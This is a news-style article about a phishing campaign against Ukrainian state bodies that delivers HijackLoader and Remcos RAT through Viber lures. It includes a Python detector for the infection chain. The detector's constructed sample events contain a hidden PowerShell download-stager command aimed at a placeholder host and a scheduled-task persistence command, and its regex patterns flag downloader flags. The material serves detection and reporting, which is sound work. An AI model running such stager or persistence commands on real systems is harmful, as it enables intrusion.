When Your "Admin" is a Spy: How Legitimate Remcos Became a Favorite Hacker Tool in Ukraine

Cybercriminals disguise infection as requests from the Verkhovna Rada and hide malicious code behind "legitimate" Windows processes.

Military and state institutions have once again become the target of a focused cyberattack in which the threat actors exploited one of the most sensitive topics for citizens. Messages on this theme served as bait in a new phishing campaign uncovered by cybersecurity specialists.
The attack is attributed to the Hive0156 group. According to data from the Chinese 360 Threat Intelligence Center, the group has been particularly active in data-hunting operations targeting military and government organizations in 2025. This time, the attackers also focused on the Verkhovna Rada.
The primary distribution channel for the attack was the popular Viber messenger. Potential victims were sent an archive with an innocuous-looking name, containing shortcuts disguised as official parliamentary documents. Among them were supposedly official requests from the Verkhovna Rada, scans of appeals from relatives of deceased servicemen, and attachments with loss lists from recent years. The themes were chosen to evoke an emotional response and the desire to immediately open the file.
Upon clicking, the user would see the expected document, but simultaneously, a complex infection chain would begin unfolding in the system. In the background, PowerShell scripts launched and additional components were downloaded from remote servers. To bypass security mechanisms, advanced techniques like DLL Sideloading, non-standard control flow transfers, and in-memory replacement of content within legitimate system modules were employed.
A key role in the attack was played by the HijackLoader. It was responsible for checking the environment, attempting to bypass antivirus software, establishing persistence via the Task Scheduler, and preparing the final infection stage. To disguise malicious activity, the code actively mimicked the behavior of legitimate Windows libraries, substituted call stacks, and even dynamically generated environment variable names, making each installation unique.
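The chain described above (a document-lookalike shortcut spawning PowerShell, which fetches components and then registers a scheduled task) leaves a recognisable sequence in process-creation telemetry. The following detector is an added example written for this article, not code from the researchers or from either malware family; it runs over constructed Sysmon-style events with placeholder hosts, paths and URLs, and the stage names and field names are my own.

```python
"""Correlate constructed process-creation events for a shortcut -> PowerShell -> scheduled-task chain."""
import re
from typing import Dict, List, Optional

# Constructed sample events (Sysmon Event ID 1-like fields); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "ts": "2025-06-01T09:00:01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -ep bypass -c \"iwr http://placeholder.invalid/a.zip -OutFile $env:TEMP\\a.zip\""},
    {"host": "ws01", "ts": "2025-06-01T09:00:07", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /tn "UpdateSvc" /tr "C:\Users\u\AppData\Roaming\svc\host.exe" /sc minute /mo 5'},
    {"host": "ws02", "ts": "2025-06-01T10:15:00", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-ChildItem C:\\Reports"},   # benign: interactive use, no stager traits
]

DOWNLOAD_RE = re.compile(r"(iwr|invoke-webrequest|downloadfile|downloadstring|-enc\b|-encodedcommand)", re.I)
HIDDEN_RE = re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass)", re.I)
USER_PATH_RE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
# Parents that launch a shortcut target when a user double-clicks it (explorer, archive viewers).
SHELL_PARENTS = ("explorer.exe", "winrar.exe", "7zfm.exe")


def stage_of(ev: Dict[str, str]) -> Optional[str]:
    """Classify one event as 'stager', 'persistence' or None."""
    img, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
    if img.endswith("powershell.exe") and parent.endswith(SHELL_PARENTS):
        # PowerShell spawned straight from the shell with downloader or hidden-window flags
        if DOWNLOAD_RE.search(cmd) or HIDDEN_RE.search(cmd):
            return "stager"
    if img.endswith("schtasks.exe") and re.search(r"/create", cmd, re.I) and USER_PATH_RE.search(cmd):
        # Task Scheduler entry whose action lives in a user-writable directory
        return "persistence"
    return None


def correlate(events: List[Dict[str, str]]) -> List[str]:
    """Return hosts where a stager launch was later followed by task persistence."""
    last_stager: Dict[str, str] = {}
    hits = set()
    for ev in sorted(events, key=lambda e: (e["host"], e["ts"])):
        stage = stage_of(ev)
        if stage == "stager":
            last_stager[ev["host"]] = ev["ts"]
        elif stage == "persistence" and ev["host"] in last_stager:
            hits.add(ev["host"])
    return sorted(hits)


if __name__ == "__main__":
    print("hosts with full chain:", correlate(SAMPLE_EVENTS))  # ['ws01']
```

Either stage alone is a useful alert on its own; the correlation is what lifts it from a noisy PowerShell rule to a high-confidence signal for this chain.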
The ultimate goal of the operation was to install the Remcos Remote Access Trojan (RAT), which is officially sold as an administrative tool but has long been actively used in espionage campaigns. Once infected, Remcos gives the attacker full control over the system, including data theft, remote command execution, screen monitoring, and persistent presence. Control is managed through a convenient graphical panel, allowing for both automated information gathering and manual work with specific targets.
Chinese analysts note that all elements of the attack fit well with the familiar modus operandi of UAC-0184. This includes the choice of victims, the use of messengers for delivering malicious files, the characteristic lures designed as official military and legal documents, and the combination of HijackLoader with Remcos. The totality of these factors allows for attributing the campaign to this group with high confidence.
Specialists once again emphasize that such attacks are designed not to exploit technical vulnerabilities but to exploit people's trust and emotional state. In the present circumstances, themes like the fates of the deceased and compensation for their families become particularly powerful tools of social engineering. This makes the cyber threat not only technical but also deeply psychological.